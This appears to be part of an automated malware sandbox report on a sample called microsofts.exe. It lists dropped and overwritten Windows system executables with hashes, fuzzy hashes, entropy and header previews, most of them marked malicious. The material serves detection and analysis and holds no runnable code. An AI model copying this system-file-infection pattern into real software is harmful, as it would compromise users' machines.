Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.28898376026791
Encrypted:	false
SSDEEP:	24576:wkdpSI+K3S/GWei+qNv2uG3BsqjnhMgeiCl7G0nehbGZpbD:w6SIGGWei2uG3VDmg27RnWGj
MD5:	D2034B1C51807A88AF4C03FA40EBB801
SHA1:	140F308CC27CF2493B3C07A32739925A7D3AA48B
SHA-256:	F9E6086CF1E942C1D038A7319D4FFB5ACCB8FF41BAB39386AF08FA030F292317
SHA-512:	747C909F375E8044DEE0C73F288A3EABEC7B8C1EEA11D6F8DE5A34457C7CFD341C8C065951BAB183144F7FF7423C86AB8188A7F2C04001E6CAB477D7279C8331
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P............ ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\Locator.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1141248
Entropy (8bit):	5.017540776134617
Encrypted:	false
SSDEEP:	12288:nqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nqsqjnhMgeiCl7G0nehbGZpbD
MD5:	F35972F9178514C7C96BA5F70EBD6D0F
SHA1:	D278A40287DAAA814250F670F468B448C02B5D3F
SHA-256:	12E9F93DA498F9BBF9AA67B867E519B4144A54A6B3E110C7241E0707610C009D
SHA-512:	2704FC5FB742D1E1D4BA15F6AB8128772AF4756074215E30B05E8482446D31DE558C0391AB6FA6D9B5BA555A19B5E6CF31DB36FABFCDE150B8C2A940DF159106
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@....................................D..... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\MsDtc\Trace\dtctrace.log

Download File

Process:	C:\Windows\System32\msdtc.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.32228418624254074
Encrypted:	false
SSDEEP:	12:FDD80kqF69Fq5zOkki6CzE5Z2+fqjFL6Dl:q1NYiY+fCLU
MD5:	5F10681583E56795A3E17B508C54C239
SHA1:	88A05AACE0FEB0D5209AA6A6C39D22C9C53B3FFC
SHA-256:	46FCE5591DB03FCF6BB7B3F97B2ABBC438D02F4444A8E564BDE118B8A7977191
SHA-512:	5AD33EDEEBC7D9FB9024A0A47ECF03FA81A05168295925835505B8ACB5F74F1203289E705C6DBC03B7E319380E8577522DA421E5B884735428EAC068389DC565
Malicious:	false
Reputation:	unknown
Preview:	.@..X...X.......................................X...!...........................T...4...$hmo.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O..............9..#..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.T...4...$hmo............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\OpenSSH\ssh-agent.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1511424
Entropy (8bit):	5.222928222730122
Encrypted:	false
SSDEEP:	12288:XObHA4LWOsvAYFTpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:4jL3UTpsqjnhMgeiCl7G0nehbGZpbD
MD5:	22C8B35FC221B2E00B4C6D91C2FD5A99
SHA1:	D86751FFA8ACB688DAF1C136F6F38E2DF62A1B3C
SHA-256:	05B5FCFCAAC3EC18490AEA20EDE57669D77E4E2A07A5B7E7A5F5EE46F233D494
SHA-512:	0302800048351C4ECBCF4190B4C9759E888411CC51C0DACD8140713989C8A9745893F7F2644D257F43150052760CAA54479F7E11CB00D920D081581EB011A384
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D\|.%...%...%...C...%...C...%...C..{%.....%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@.......................................... ......................................................... ..x.......T...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1235968
Entropy (8bit):	5.182224091818911
Encrypted:	false
SSDEEP:	12288:mpFtQOVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1OVsqjnhMgeiCl7G0nehbGZpbD
MD5:	7E2B07A2C35B902626802E23A74035AA
SHA1:	265F1C1CE693A31597008763C37B34B144A002F8
SHA-256:	B9122C5DE6C57135EAD309E5AE002EE13F10E42541194E1418320086EA4969AB
SHA-512:	E384812DC80E0240CC2FD7411CFEB04BBB130E28EDB8E5EA77B4E130738FC516AC777AEFA762B75FEAC2EFF8B18209BFC95B632C8466ADA0C97151344F7AE805
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................~6.... .......... ......................................Xq..........x............................S..T...................(..(....)..............P...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

C:\Windows\System32\SearchIndexer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	7.10241717047858
Encrypted:	false
SSDEEP:	24576:W3frCoQItLsiLPLe24CxruW4bIhllpsqjnhMgeiCl7G0nehbGZpbD:W3fzsIPLkCNuVbIhDtDmg27RnWGj
MD5:	C8FD576348CEEF52216538407BF399C0
SHA1:	31C6477A6409B9BB134C7C1FC1C60BC76B5E8878
SHA-256:	8B814F94D6949F62ED9CDD6C8AF27CB3E71E68EB98072F585EFAC5B48B49F035
SHA-512:	8E4463D8CBE67DE841931E5411895792DCC375BAAB03DB23D7DD04AB6800F4F7691558AB7362916049BCCCE225DDE1711E5371E850CD7B9B17B46DA2EB99335C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.....................................`.... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

C:\Windows\System32\SensorDataService.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1846784
Entropy (8bit):	6.939479100390497
Encrypted:	false
SSDEEP:	24576:FW6BApg2YuyuNDYTabvcRvNYf8km1ssqjnhMgeiCl7G0nehbGZpbD:FF2YuHNETovcvNYf8kmiDmg27RnWGj
MD5:	EFF39178E107116F25C210E8F7E3BD8D
SHA1:	1BCF5684F37241EFBC68B3B0CB401BE46ACE66DC
SHA-256:	1D5D0086C058BAEB1BE49D289694B88A24FF61C75B91A5959C3092758BD64F29
SHA-512:	7F244D1263DB7F30F067187ADDE64467C250B1C5FBE1C01A1AEEE30B6305CE935D94C8256D7F2C786D3664C2946522EE9D37E0C5AE7672CE8A814ED8AB172E3F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p............ .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\Spectrum.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	7.23891801973794
Encrypted:	false
SSDEEP:	24576:ciW6ZvAKF5i/dN9Bdexj9Trk+FVsqjnhMgeiCl7G0nehbGZpbD:cYxF50b9Bdm9TxTDmg27RnWGj
MD5:	3B684CE90D25C1620D4492D93A4C2E12
SHA1:	3E320DB8BBCED908D7F47BCBF2A5E8687AA32CF9
SHA-256:	BDE8CAE55F04BA7E8573968DD59B418F58DB4AD536B07AD13372DFD26ED74403
SHA-512:	A0B7DCB7028558DFD7D1112EAC32581191411E6144FEF7556F1A306BAAE4982958E7C5ACB72C2056542D3D914059D7DD616F624BEF8E68F729E41ECAD8FE1B9C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...{..4...{..=...>...+...{..9...{..V...{......{n.?...{l.?...{..?...Rich>...........PE..d...)ew..........."................. ~.........@.......................................... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

C:\Windows\System32\TieringEngineService.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	5.476611231782756
Encrypted:	false
SSDEEP:	24576:dJnJ5D3WY4sqjnhMgeiCl7G0nehbGZpbD:dJnJ5DGYkDmg27RnWGj
MD5:	8D1BA858E12A31A352EFC97D6B03E07E
SHA1:	2C729F5E6C6D413946C3F3D8297EBA2EF1E6D9D9
SHA-256:	199BAAE7D2A5E7E84F4080B2921547C43BB2F02ADAC5A758DC954E2CA6915222
SHA-512:	0DCEF3B681F7F70D1ACF6BE8439AB937C359B62037DF5698FDCB9F7F06EB094D986CE47D97904615EC1E2345D8A13D7974C132CE19C46437DC5D037BFEB2EE41
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...\|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

C:\Windows\System32\VSSVC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2075136
Entropy (8bit):	6.7366016201977805
Encrypted:	false
SSDEEP:	49152:TPK86JYTerDjfJ2313e1mP1MdnUvDmg27RnWGj:jD527BWG
MD5:	57A152F906FD3ED51A45FC41DD986F5B
SHA1:	8952A04265F95C4FF565E65FFE3704E06209C776
SHA-256:	03971255A47B8A2994EF2D370865E7D36DC887526A6EE5A4D29038906DF30304
SHA-512:	DAD0AAD91128D7A5C8C36706EA0D9B4D5D09240F375A989F134AD2C57AD812DE1561602DC8DC270D0D921AC4BD7B7EAD6F7887EF201463652E61948B13C8FD52
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ...... ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`\|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.16333305948807
Encrypted:	false
SSDEEP:	12288:aEP3R6UXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:56UsqjnhMgeiCl7G0nehbGZpbD
MD5:	BE9575A7523344297F06EE1BFB41DB64
SHA1:	DE9FF538D9D5C07DD4265D6B83B4E33224B271C8
SHA-256:	8DD53F71981F1D1732F193F8C2A8D9EC60E81133E5F94A24316DC60DF1A0EC6E
SHA-512:	4D2F4FA5F73A12781DFB0168642593FB909D1BB21F1885DDDE93D2E419181E280EBDA02B9BF593F962E480D56BF39E37EB4E96E9EB7AFD1272575427454E95D4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................Gf.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\76fb15a314ced2a4.bin

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984227497815774
Encrypted:	false
SSDEEP:	384:2l4M68u9iCTTcqh8VuTLX0f9h3eusIiCmbjlKztUqy:2OM49pJOsX+9hAIiXPcZUh
MD5:	1EBEC977C16E1FA319CEC055410ABD82
SHA1:	A489EE61FACA3A5E44A8ABA2E5D5CDDAE5B36B33
SHA-256:	57A6A09543B9230AC875CEA6620CBEB9B842110F992AFB0989FA738A5383368B
SHA-512:	1E2DD578A793E2DF4D47E95DB8ED6DC9F36497A198C1D0DA6EC2E03F33DFBC85CE6C02147D0CC4C0919EEA921D27769BEDB19B0A70D958430AB6982270F2FB8A
Malicious:	false
Reputation:	unknown
Preview:	....k\|.n..}H.c..2]........F9;.......h......=d.k.(...p..\S..A.......yC..Y.{U..S.hx......,....;9q.w......s.:....(.B......B.........J.@J./=..1HL5.N.1..d#..YJ..)KW.g.t0\|.......).......W..d6..l..`.?.?)..nO....P\(H...w...j.Hv)..&.Q~.f..,...e..U..JW...M.M,/....n....0G\.....r.'."....T4.3..1.9..l..<n.V..?+.....`..5.t.b.ub..>Y.z..iE.....U. .B.[.p.?..o.a.k..H...;....U..pd}.....>Y......60.d .RQ..d.h...V.x..{..$....J...FG..>...o."...<...{.TU..&..h.j\C...`J.....^....5.0D`.L...V.9....fNK..-.uM....M...........tz_......$W.N&G..........f=DC.Y3....2MohD8....3..E.5eG_.KB.....\...-.....62#.x.x....&..Z...9X=[.N.........H..L....J..p.Xh...m#.............._.....9......w.TJ....O....#\......G.7!.,.;..>..6..5.%........t......4G...@.yz.r.K.ar..=.< ...`....Y...y...b?.5.vs..K.1.A.i_.~............8hp".i.}^47..Qy..W......f.....b..v......(kr..*../.n...#a..}.+...o.f.I.5.r.....5.:.[..~g..t.k....s.._.e\L}\.l.I.VwK..R_...V..cA.A.?4..;..h............L.d.....k..S.1A..f...k.

C:\Windows\System32\msdtc.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1278464
Entropy (8bit):	5.1429920304739705
Encrypted:	false
SSDEEP:	12288:Rjky/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:RIy/sqjnhMgeiCl7G0nehbGZpbD
MD5:	51F79D9079F5ECD5822D4A712D6E0FAE
SHA1:	62E82C41DD9DE42E53CF63D1098698C9CDB2DAED
SHA-256:	93E8AFEE1ABD0FA887F2370C04849559EDD91DE60945953846AB510DB95A17CB
SHA-512:	140E15547116A194E128C64B69FFE11F4292751B0E223E0E4128D318D7CA2A685999FF45CDB63C2158A0000F311F2D63F790FDD17617C4B45D0ED74D5716ED2A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.....................................Z.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

C:\Windows\System32\msiexec.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1199616
Entropy (8bit):	5.083905485732483
Encrypted:	false
SSDEEP:	12288:74DpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mpsqjnhMgeiCl7G0nehbGZpbD
MD5:	2B61253283F01E05B86928E451FF60F9
SHA1:	82752324A9A7A4FCC3145951301A29706B9363C5
SHA-256:	77C04906B466B338E7306DD9E650DB19ED6E9C11A8510C0D8D22504112B69BAC
SHA-512:	455C3A83FC2F923D05CF10EA151EC6D87B110284FD6EF2509CAABE7C590568EBAFF9A2338F5C611157D71C795453107B29FF1036019C5CF36B2041F30C46E539
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................c`.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

C:\Windows\System32\snmptrap.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1146880
Entropy (8bit):	5.027596510409976
Encrypted:	false
SSDEEP:	12288:j9FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZFsqjnhMgeiCl7G0nehbGZpbD
MD5:	49483B645B4353EA55A5E7C5EB864F13
SHA1:	255EC6C59E410984F477341466AFF711A8385030
SHA-256:	AF243C2CA58F0E205CA1AABC0E59CC93AB787E6451F244E0C510BD8741D2DC93
SHA-512:	00935A721BEBFBE8EFA422B11647CE7F15F990368F9C49362814E8D63CC5FFFFFD3B457C1E644B529B97B8DDFFD1B58AB8D0E36EA6515A5A0436DC1AD9218438
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................g..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

C:\Windows\System32\vds.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1303552
Entropy (8bit):	7.171609600048029
Encrypted:	false
SSDEEP:	24576:ZZ0FxT1UoYr99GdcpKEsqjnhMgeiCl7G0nehbGZpbD:HwWcgDmg27RnWGj
MD5:	A5ACADA58AE262FF7A95C041CC61974E
SHA1:	CA52CED0A0AD767284BF02E633E2336FE03C3EC3
SHA-256:	309267A2742C471F0F8399285C4BC26260479C5D3374EAFD7982F37259E2A135
SHA-512:	9BC9C30FFDB559D1286C36394D5DB43DE36E7480AF28216540B081243DA36488BC0335731E17E032545EDD37E433E883BD59F7972AE68F123C6B8177E83A4DE9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......y.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

C:\Windows\System32\wbem\WmiApSrv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339392
Entropy (8bit):	5.269315503797195
Encrypted:	false
SSDEEP:	12288:iyoKo2fRple9p3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:iyocJAp3sqjnhMgeiCl7G0nehbGZpbD
MD5:	CF56FBCEAC28E07F876DA1ECF4CB89C1
SHA1:	DBD1AE4630C411C670D9E1D1CA943E61E489E06C
SHA-256:	EE3C9555A4B630B58F82343449DD4BC15F4797C60AFB93C8F57017259299CB4F
SHA-512:	21B34F317FEEB27EBEEFB1ACAD5595C724894F4C18D59E326C8C4828F1281ECD6E3DE0391E0CB941CD6D9B2604FE38FE83476E0BFC86D13AF3D720B87895EEC8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@....................................4..... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

C:\Windows\System32\wbengine.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2164736
Entropy (8bit):	7.062051448205074
Encrypted:	false
SSDEEP:	49152:eWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKPDmg27RnWGj:40zuNIrD527BWG
MD5:	E47BE0CB009D27E2C029678B8A634B14
SHA1:	19DC039DC693955BF9AA03974B3561B6C7254D39
SHA-256:	AB2BDB864DBDEF602E742617062881CAF1DBD47696FDB265F8D46A976FBA44FC
SHA-512:	9799E1B9BBFD79D276345B5BEF0FF9C69C48B9F9B4CC36791D0378BD619113FC096B2501D4F431AEF503EB48AF1D4AE3A1B004DF773A9A0908E0320C2AC8E43A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....f\|!... .......... ...............................z......h...\|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09984641489051023
Encrypted:	false
SSDEEP:	6:saUyY3l/k/uMclF6vMclFq5zw7qNOn+SkUeYDwDzymmyBj:spyYV/kqF69Fq5zaeO+pawHymmyd
MD5:	9568D84EB762A4830317A222BA7B7E2A
SHA1:	A1A5BBAFFE0D0F1F4D16ACA4A50F292DA820BDD2
SHA-256:	111AD2432AE4AD603A575905C77FCB45C6CDA543E1E274C0E7CB920A9EE8F7A4
SHA-512:	3366FCAF5A389A31B863B8A6186B60E541B47B7964F6F1E941EDA52F09D8B5BE4FCD67862CB04BCD5DACA0D94A91002DC11CCABA37D40A8C31F8AB6AD718AF51
Malicious:	false
Reputation:	unknown
Preview:	....`...`.......................................`...!......................................t....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............1^..#..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P............t....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10137044960129345
Encrypted:	false
SSDEEP:	6:Vl6g73l/k/uMclF6vMclFq5zwkNMu3n+SkUeYDwDzyMjb:Vl6KV/kqF69Fq5zFX+pawHyI
MD5:	8692E9844DB33678E711C10AC8CB1A6E
SHA1:	FAFCAE0BD80796BAB15442BFEA77459E7194C12C
SHA-256:	DE28A5FD82A9AC0CAB0B2F5E220F27B470B76AFB391D8F4D2D6AAD688B169500
SHA-512:	316FD79FE525CAD90F91129281529A04E287BD2519A0AE9279FCA2E0B8FCF8091DA9BAFF795566BC3100CC463E536C097C56C4202F9DFFD868AEE076B9E87328
Malicious:	false
Reputation:	unknown
Preview:	....h...h.......................................h...!.....................................t....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............m_..#..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P...........t............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09877619154710354
Encrypted:	false
SSDEEP:	6:uFev23Nk/uMclF6vMclFq5zw2WpHNIn+SkUeYDwDzy9v/r:ucv29kqF69Fq5zqtI+pawHy9vD
MD5:	5A4A4A3C5EBE8A0FC8181379A79D86AC
SHA1:	3429AED079F9EEE577AB8060C676EB48F2C0AF0B
SHA-256:	DE15F23B047EC7F720326EC61CB44EB369E1674DE1A47E42BD36A1D8C7A8FECF
SHA-512:	66B15A887B02AD2ABBCCF539306009C48A8A3D8AE797C2FD60B86954F6B3A9ED495C7F33BD1D40BD903C1A8578EE0A8E660582E2576EB4886B03A7F77242CF08
Malicious:	false
Reputation:	unknown
